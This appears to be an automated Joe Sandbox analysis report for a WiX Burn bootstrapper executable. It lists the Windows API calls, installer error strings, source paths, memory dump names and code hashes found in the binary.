                                                                                                                                                          • Opcode Fuzzy Hash: e67bb97bb647ff56a366137ba8d90f276f02aabc0407f7c06bb81fee3795556d
                                                                                                                                                          • Instruction Fuzzy Hash: 6541E535740304BBDB119B94CC5DF6E37A9EB95B14F1000AAF905FB290EBB89941CBD9
                                                                                                                                                          APIs
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0046AD56
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0046AD93
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0046ADA4
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to query IXMLDOMParseError.reason., xrefs: 0046AD3A
                                                                                                                                                          • Failed to query IXMLDOMParseError.srcText ., xrefs: 0046AD77
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046AC92
                                                                                                                                                          • Failed to query IXMLDOMParseError.errorCode., xrefs: 0046AC83
                                                                                                                                                          • Failed to query IXMLDOMParseError.linepos., xrefs: 0046AD0E
                                                                                                                                                          • Failed to query IXMLDOMParseError.filepos., xrefs: 0046ACBC
                                                                                                                                                          • Failed to query IXMLDOMParseError.line., xrefs: 0046ACE5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeString
                                                                                                                                                          • String ID: Failed to query IXMLDOMParseError.errorCode.$Failed to query IXMLDOMParseError.filepos.$Failed to query IXMLDOMParseError.line.$Failed to query IXMLDOMParseError.linepos.$Failed to query IXMLDOMParseError.reason.$Failed to query IXMLDOMParseError.srcText .$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                          • API String ID: 3341692771-2262128350
                                                                                                                                                          • Opcode ID: ac419329126950b26396367ec22f083ea1a63c757682ee82852260168ed47f46
                                                                                                                                                          • Instruction ID: 3ebd1e830965324a84045372205697a0bb537b652537c55aa7d44c6927400a6e
                                                                                                                                                          • Opcode Fuzzy Hash: ac419329126950b26396367ec22f083ea1a63c757682ee82852260168ed47f46
                                                                                                                                                          • Instruction Fuzzy Hash: C0417E74B40616FFEB058F54CD05E6EB778EF14B45F10006AFA01BB1A0EAB46E10DE9A
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 0040A838
                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 0040A84C
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040A858
                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 0040A8CC
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040A8D6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                          • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 2700948981-3139844080
                                                                                                                                                          • Opcode ID: 5b3e79c14f1e73e1237e9545a4227cdc0091e17144af8b1199b7d648a7b4fd19
                                                                                                                                                          • Instruction ID: 6fad916c169dbedc69a2277831b6c0e5b90c319066e3fdea440f0ffe01d20b6d
                                                                                                                                                          • Opcode Fuzzy Hash: 5b3e79c14f1e73e1237e9545a4227cdc0091e17144af8b1199b7d648a7b4fd19
                                                                                                                                                          • Instruction Fuzzy Hash: A9313772F4032577E721A6A48C46FEF7A68DF05B51F524136BE04FB2D1D6789C0182EA
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0041D183
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041D193
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0041D2AA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                          • String ID: %ls container from working path '%ls' to path '%ls'$Container has no verification information: %ls$Copying$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 2528220319-3847090587
                                                                                                                                                          • Opcode ID: 28896a0abe1acda6859e4031bb54d4c01e7ec9ce62f13cac4d25cc9f0b57d717
                                                                                                                                                          • Instruction ID: 0e80f200336933fc2f245bcb973d741ef06dd3fdd81c96c68d39d7dc0a125146
                                                                                                                                                          • Opcode Fuzzy Hash: 28896a0abe1acda6859e4031bb54d4c01e7ec9ce62f13cac4d25cc9f0b57d717
                                                                                                                                                          • Instruction Fuzzy Hash: 5731C972A40215BBDF226E848C46FAF3A25EF45B10F11415AFF04791D1E3BAC96097AD
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 0040B27E
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040B285
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040B291
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                          • String ID: DllGetVersion$Failed to create msi.dll version from QWORD.$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp$msi
                                                                                                                                                          • API String ID: 4275029093-1690136764
                                                                                                                                                          • Opcode ID: 0244b8991ec16c8d0d34c00a1c06790edf71f267c9baa3c8e049c3e83c66ddee
                                                                                                                                                          • Instruction ID: 9789ff91b8c5858668b469e4af5beb65b3920ee255fcfdf676dfa3f281aabf0e
                                                                                                                                                          • Opcode Fuzzy Hash: 0244b8991ec16c8d0d34c00a1c06790edf71f267c9baa3c8e049c3e83c66ddee
                                                                                                                                                          • Instruction Fuzzy Hash: 3F310831E40625B7D72166A88C4ABAF7668DB04B54F11417BFE04FA2D1E6BC9C0086DD
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?), ref: 0044F6F6
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044F93D
                                                                                                                                                          Strings
                                                                                                                                                          • Engine is active, cannot change engine state., xrefs: 0044F70E
                                                                                                                                                          • BA requested unknown payload with id: %ls, xrefs: 0044F759
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\externalengine.cpp, xrefs: 0044F720, 0044F7B3, 0044F92C
                                                                                                                                                          • Failed to set download password., xrefs: 0044F8AB
                                                                                                                                                          • Failed to set download URL., xrefs: 0044F83B
                                                                                                                                                          • BA did not provide container or payload id., xrefs: 0044F915
                                                                                                                                                          • Failed to set download user., xrefs: 0044F877
                                                                                                                                                          • Failed to set download authorization header., xrefs: 0044F7EA
                                                                                                                                                          • BA requested unknown container with id: %ls, xrefs: 0044F7A1
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: BA did not provide container or payload id.$BA requested unknown container with id: %ls$BA requested unknown payload with id: %ls$Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download authorization header.$Failed to set download password.$Failed to set download user.$d:\a\wix\wix\src\burn\engine\externalengine.cpp
                                                                                                                                                          • API String ID: 3168844106-195893171
                                                                                                                                                          • Opcode ID: 437d2b303ffa29f6116822e6da80ee593af5217e39f0194f5b806a5bf1f23dfb
                                                                                                                                                          • Instruction ID: 15c49b3e4c77ff30ef71b3be53de7f9231c4ea4b95c1a082739607a4f2841f30
                                                                                                                                                          • Opcode Fuzzy Hash: 437d2b303ffa29f6116822e6da80ee593af5217e39f0194f5b806a5bf1f23dfb
                                                                                                                                                          • Instruction Fuzzy Hash: A161E571A40706BAEB21AE61CC45F977A68AF00714F11413BB904BB2C1E7B8ED94C798
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                          • String ID: Failed to break URL into server and resource parts.$Failed to connect to URL: %ls$Failed to open internet URL: %ls$Failed to send request to URL: %ls$\gG$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp$fgG$zgG
                                                                                                                                                          • API String ID: 1659193697-2193951561
                                                                                                                                                          • Opcode ID: aa3464fa8febb449d5b8377f3e27975523a0c4dfb400f2fcb7a9892bdc9f7307
                                                                                                                                                          • Instruction ID: 3107f280a7a47e660f78732fe146ffcefe0946e4e03a39ac17fab45ae9ecea19
                                                                                                                                                          • Opcode Fuzzy Hash: aa3464fa8febb449d5b8377f3e27975523a0c4dfb400f2fcb7a9892bdc9f7307
                                                                                                                                                          • Instruction Fuzzy Hash: FF51A231A00215BBDB219FE58D49EDF7B78EF48B10F158066FD08B7251D6B8D9409BA8
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNEL32(?,-000000B0,?,?,?,000000C8,00000000,00000001,00000000,00000000,?,00000000,?,00000000,004086B5,?), ref: 00414BA1
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,-000000B0,?,?,?,000000C8,00000000,00000001,00000000,00000000,?,00000000,?,00000000,004086B5,?), ref: 00414BAD
                                                                                                                                                            • Part of subcall function 00413FD8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 004140D6
                                                                                                                                                            • Part of subcall function 00413FD8: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 004140E7
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to create bootstrapper application pipename and secret, xrefs: 00414A0C
                                                                                                                                                          • Failed to create bootstrapper application process: %ls, xrefs: 00414A86
                                                                                                                                                          • Failed to create bootstrapper application engine context., xrefs: 00414AF4
                                                                                                                                                          • Failed to start listening to bootstrapper application engine pipe., xrefs: 00414B3C
                                                                                                                                                          • Failed while waiting for bootstrapper application to connect., xrefs: 00414ACB
                                                                                                                                                          • Failed to create bootstrapper application, xrefs: 00414B6A
                                                                                                                                                          • Failed to find bootstrapper application path., xrefs: 004149DD
                                                                                                                                                          • Failed to create bootstrapper application pipes, xrefs: 00414A39
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp, xrefs: 00414A4B, 00414A98, 00414B7C
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID: Failed to create bootstrapper application$Failed to create bootstrapper application engine context.$Failed to create bootstrapper application pipename and secret$Failed to create bootstrapper application pipes$Failed to create bootstrapper application process: %ls$Failed to find bootstrapper application path.$Failed to start listening to bootstrapper application engine pipe.$Failed while waiting for bootstrapper application to connect.$d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp
                                                                                                                                                          • API String ID: 2962429428-1681899986
                                                                                                                                                          • Opcode ID: 0168c9965c51409dc2e98712057dc00afbbd015cdcdf6de2da9c9aa292d288e1
                                                                                                                                                          • Instruction ID: 326369eec9e3c79232ad70bb13c27142335d20dced63185dbac1ae278f4b4b31
                                                                                                                                                          • Opcode Fuzzy Hash: 0168c9965c51409dc2e98712057dc00afbbd015cdcdf6de2da9c9aa292d288e1
                                                                                                                                                          • Instruction Fuzzy Hash: 8661E371E40319BBDB11DAA5CC45FEF7B74AF44720F21426AF914BB2C1D778A9808B98
                                                                                                                                                          APIs
                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,?,?,0046F6BA,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,-80000001,00000000), ref: 0046799D
                                                                                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,?,0046F6BA,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,-80000001,00000000), ref: 004679CB
                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,?,?,0046F6BA,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,-80000001,00000000), ref: 00467A52
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Enum$InfoQuery
                                                                                                                                                          • String ID: Failed to allocate string bigger for enum registry key.$Failed to allocate string to minimum size.$Failed to determine length of string.$Failed to enum registry key.$Failed to get max size of subkey name under registry key.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 73471667-1664653701
                                                                                                                                                          • Opcode ID: 2b305e50b481bfcda930989d0213577f84489db96055e10292eed4aea7680a3d
                                                                                                                                                          • Instruction ID: 4c24fe0a9c51ad9fddec600e8343e8ce8d3708d16ad231adc714d88fbca4def2
                                                                                                                                                          • Opcode Fuzzy Hash: 2b305e50b481bfcda930989d0213577f84489db96055e10292eed4aea7680a3d
                                                                                                                                                          • Instruction Fuzzy Hash: FA416E75604224BBFB208B55CC49F6F3BADDF85764F21002BB904E7290F5788E01D7AA
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000001,00000000,?,00000000,?,00000000,7FFFFFFF,?,00000000,7FFFFFFF,?,00000000,?,00000005,00000000), ref: 0046D266
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed to canonicalize the directory.$Failed to canonicalize the path.$Failed to get length of canonicalized directory.$Failed to get length of canonicalized path.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path2utl.cpp$wzDirectory is required.$wzDirectory must be a fully qualified path.$wzPath is required.
                                                                                                                                                          • API String ID: 1825529933-3101159277
                                                                                                                                                          • Opcode ID: a37df57adf2c91c51fb25a142e4aa93065cf09bdb4b2754ea5d932d29745239e
                                                                                                                                                          • Instruction ID: a1a22e7e3c59975847a529ef378e711541314c954ab373a3ff61bcfdeb0874db
                                                                                                                                                          • Opcode Fuzzy Hash: a37df57adf2c91c51fb25a142e4aa93065cf09bdb4b2754ea5d932d29745239e
                                                                                                                                                          • Instruction Fuzzy Hash: 8C410C70F80305B6EB20AA958C8AFEF766C9F56B45F110167B604BE1C1F6FC8D01965E
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: _memcpy_s
• String ID: Failed to find variable.$Failed to format variable '%ls' for condition '%ls'$Failed to get if variable is hidden.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$Failed to store formatted value for variable '%ls' for condition '%ls'$d:\a\wix\wix\src\burn\engine\condition.cpp$feclient.dll
APIs
• LocalFree.KERNEL32(00000000,00000000,00000001,80000005,00000000,00000000,00000000,00000000,00000003,000007D0), ref: 0041C6F7
Strings
• Failed to allocate access for Administrators group to path: %ls, xrefs: 0041C5AA
• d:\a\wix\wix\src\burn\engine\cache.cpp, xrefs: 0041C682, 0041C6DB
• Failed to create ACL to secure cache path: %ls, xrefs: 0041C68D
• Failed to allocate access for Everyone group to path: %ls, xrefs: 0041C606
• Failed to secure cache path: %ls, xrefs: 0041C6C9
• Failed to allocate access for Users group to path: %ls, xrefs: 0041C634
• Failed to allocate access for SYSTEM group to path: %ls, xrefs: 0041C5D8
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: FreeLocal
• String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$d:\a\wix\wix\src\burn\engine\cache.cpp
APIs
• GetFullPathNameW.KERNEL32(00000000,00000105,?,0100147D,?,00000105,00000000,00000000,0100147D,?,00000000,004080B0), ref: 004066CF
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: FullNamePath
• String ID: Failed to allocate space for full path.$Failed to get current directory.$Failed to get full path for string: %ls$Failed to get max length of input buffer.$Failed to reallocate space for full path.$GetFullPathNameW results never converged.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
APIs
  • Part of subcall function 00405685: SetFilePointerEx.KERNEL32(?,?,?,?,?,00000000,?,?,?,0041BDC6,00000000,00000000,00000000,00000000,00000000), ref: 004056A3
  • Part of subcall function 00405685: GetLastError.KERNEL32(?,?,?,0041BDC6,00000000,00000000,00000000,00000000,00000000,?,00000001,?,WixBundleOriginalSource,?,?,?), ref: 004056AD
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004728BC
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: File$ErrorLastPointerWrite
• String ID: Failed to seek to start point in file.$Failed to write data from internet.$Failed while reading from internet.$UX aborted on cache progress.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp$pgG
APIs
  • Part of subcall function 0046F352: lstrlenW.KERNEL32(89F84589,004221A7,00000000,00000000,?,0046F557,00000000), ref: 0046F378
• RegCloseKey.ADVAPI32(00000000,?,00000000,004777D8,?,8000FFFF,8000FFFF,00020006,00000000,00000000,00000000,00000000,feclient.dll,00477868,8000FFFF,?), ref: 0046FB83
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: Closelstrlen
• String ID: Failed to allocate the registry key for dependency "%ls".$Failed to create the dependency registry key "%ls".$Failed to set the %ls registry value to "%ls".$Failed to set the %ls registry value to %d.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp$default$feclient.dll$version.dll
Strings
• d:\a\wix\wix\src\burn\engine\search.cpp, xrefs: 004120D5, 004120DA, 004120F7, 00412155
• Failed to initialize file search., xrefs: 00412053
• File search: %ls, found directory at path: %ls, xrefs: 00412123
• File search: %ls, failed get to file attributes. '%ls', xrefs: 004120E5
• Failed to format variable string., xrefs: 00412080
• File search: %ls, did not find path: %ls, xrefs: 00412107
• Failed to set variable., xrefs: 00412143
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID:
• String ID: Failed to format variable string.$Failed to initialize file search.$Failed to set variable.$File search: %ls, did not find path: %ls$File search: %ls, failed get to file attributes. '%ls'$File search: %ls, found directory at path: %ls$d:\a\wix\wix\src\burn\engine\search.cpp
                                                                                                                                                          • API String ID: 0-2446600326
                                                                                                                                                          • Opcode ID: 00a743e6250d58573940139f4cad41f195cf0ce7cbe81804f62fbb0e1b3a9080
                                                                                                                                                          • Instruction ID: f397e40787b8aa9b6703d37d70d173b2b642689c0419d1560a6d191f2d5b58e5
                                                                                                                                                          • Opcode Fuzzy Hash: 00a743e6250d58573940139f4cad41f195cf0ce7cbe81804f62fbb0e1b3a9080
                                                                                                                                                          • Instruction Fuzzy Hash: 37311C72A4022177D7116A558E4AFEB7A28EF18710F510177FB04F61D1E3F85DA0869D
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00466A42
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00466A4C
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 00466AAB
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 00466ABD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                          • String ID: "%ls" %ls$$yG$Failed to allocate full command-line.$Failed to create process: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                          • API String ID: 161867955-3305797711
                                                                                                                                                          • Opcode ID: 39aa812035a4ee3e1fcf553d6edf9f0b6350589ac03a0ebd6325394d8ffa88fd
                                                                                                                                                          • Instruction ID: 275656764bd47e9f66e5ab32577e4aba58f40f237b3c124253cbdc9ec7ea17fc
                                                                                                                                                          • Opcode Fuzzy Hash: 39aa812035a4ee3e1fcf553d6edf9f0b6350589ac03a0ebd6325394d8ffa88fd
                                                                                                                                                          • Instruction Fuzzy Hash: F931A175E00219BBDB119FD5CD45BEFBB78EB05718F114026FA04B6291E3788E44CBAA
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000008,?,?,00000000,00000000,00000000,00000008,?,00000000,?,?), ref: 00419585
                                                                                                                                                          • ProcessIdToSessionId.KERNEL32(00000000), ref: 0041958C
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to get length of session id string., xrefs: 004195DF
                                                                                                                                                          • Failed to format session id as a string., xrefs: 004195B4
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\logging.cpp, xrefs: 00419645
                                                                                                                                                          • Failed to get temp folder., xrefs: 0041956A
                                                                                                                                                          • %u\, xrefs: 004195A0
                                                                                                                                                          • Failed to copy temp folder., xrefs: 00419633
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CurrentSession
                                                                                                                                                          • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get temp folder.$d:\a\wix\wix\src\burn\engine\logging.cpp
                                                                                                                                                          • API String ID: 2701954971-2964926622
                                                                                                                                                          • Opcode ID: 230fae8221645e749bbedd1f273bc622e12872778d711b78ece17c53be75ff66
                                                                                                                                                          • Instruction ID: 0fbf5a53be4df2ede5d6bbd82a7a163408fafe7c8c2b8077fa836c5f48436e1b
                                                                                                                                                          • Opcode Fuzzy Hash: 230fae8221645e749bbedd1f273bc622e12872778d711b78ece17c53be75ff66
                                                                                                                                                          • Instruction Fuzzy Hash: AE31A771E40219BACF21AA95CD15EDFBFB8EF44750F110167F500B6290D7785E4087A8
                                                                                                                                                          APIs
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000001,?,?,0040944D), ref: 004666A5
                                                                                                                                                            • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
                                                                                                                                                            • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
                                                                                                                                                          • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 0046663B
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0040944D,?,?,?,?,?,?,?), ref: 00466647
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
